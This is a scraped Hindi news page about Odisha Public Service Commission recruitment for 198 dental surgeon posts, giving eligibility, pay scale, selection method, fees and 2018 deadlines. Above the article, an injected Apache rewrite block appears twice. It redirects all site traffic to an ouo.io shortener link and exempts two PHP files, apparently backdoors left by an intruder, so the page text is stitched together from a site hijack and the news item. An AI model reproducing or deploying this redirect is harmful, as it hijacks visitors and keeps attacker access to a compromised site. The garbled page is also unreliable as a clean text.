
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 392
Previousनई दिल्ली। ओडिशा पब्लिक सर्विस कमीशन (ओपीएससी) ने डेंटल सर्जन (ग्रुप-ए) पद पर कुल 198 रिक्तियां निकाली हैं। इन पदों को हेल्थ एंड फैमिली वेल्फेयर डिपार्टमेंट के तहत ओडिशा मेडिकल सर्विसेज (डेंटल) कैडर के लिए नियुक्त किया जाएगा। हर तरह के आरक्षण का लाभ केवल ओडिशा के मूल निवासियों के मिलेगा। अन्य राज्यों के अभ्यर्थी अनारक्षित श्रेणी में माने जाएंगे। इच्छुक और योग्य उम्मीदवार इन पदों के लिए ऑनलाइन आवेदन कर सकते हैं।
कुल पद : 198 (अनारक्षित-126)
योग्यता:
- मान्यता प्राप्त यूनिवर्सिटी या संस्थान से डेंटल सर्जरी में स्नातक डिग्री प्राप्त की हो।
- साथ ही डेंटल काउंसिल ऑफ इंडिया में रजिस्ट्रेशन हो।
- न्यूनतम 21 वर्ष और अधिकतम 32 वर्ष।
वेतनमान : 15,600 से 39,100 रुपये। ग्रेड पे 5400 रुपये।
चयन प्रक्रिया
- योग्य उम्मीदवारों का चयन करियर मार्किंग और रिटन टेस्ट के आधार पर होगा
- करियर मार्किंग के लिए 30 फीसदी और रिटन टेस्ट के लिए 70 फीसदी वेटेज होगा।
- करियर मार्किंग में दसवीं, बारहवीं और स्नातक के अंकों को शामिल किया जाएगा।
- रिटन टेस्ट बहुविकल्पीय प्रश्नों पर आधारित होगा। यह कुल 200 अंकों के लिए होगा।
- प्रश्नपत्र में कुल 200 सवाल होंगे। इनको हल करने के लिए तीन घंटे का समय मिलेगा।
- नेगेटिव मार्किंग नहीं की जाएगी।
- परीक्षा का आयोजन कटक में किया जाएगा।
आवेदन शुल्क : 300 रुपये। दिव्यांगों और ओडिशा के एससी/ एसटी आवेदकों के लिए शुल्क देय नहीं है।
आवेदन प्रक्रिया
- वेबसाइट http://opsconline.gov.in पर लॉगइन करें। यहां होमपेज पर Examination सेक्शन में आपको Dental Surgeon लिखा हुआ नजर आएगा।
- इसके सामने Click Here लिंक पर क्लिक करें।
- ऐसा करने पर पद संबंधित विज्ञापन खुल जाएगा। इसमें दी गई जानकारियां ध्यान से पढ़ें और अपनी योग्यता जांच लें।
- अब आवेदन करने के लिए Apply Online लिंक पर क्लिक करें।
खास तारीखें
ऑनलाइन आवेदन की अंतिम तारीख : 07 अप्रैल 2018
रिटन टेस्ट की संभावित तारीख : 06 मई 2018
अधिक जानकारी यहां
टोल फ्री : 18003456770
फोन : 0671-2368267/ 2304141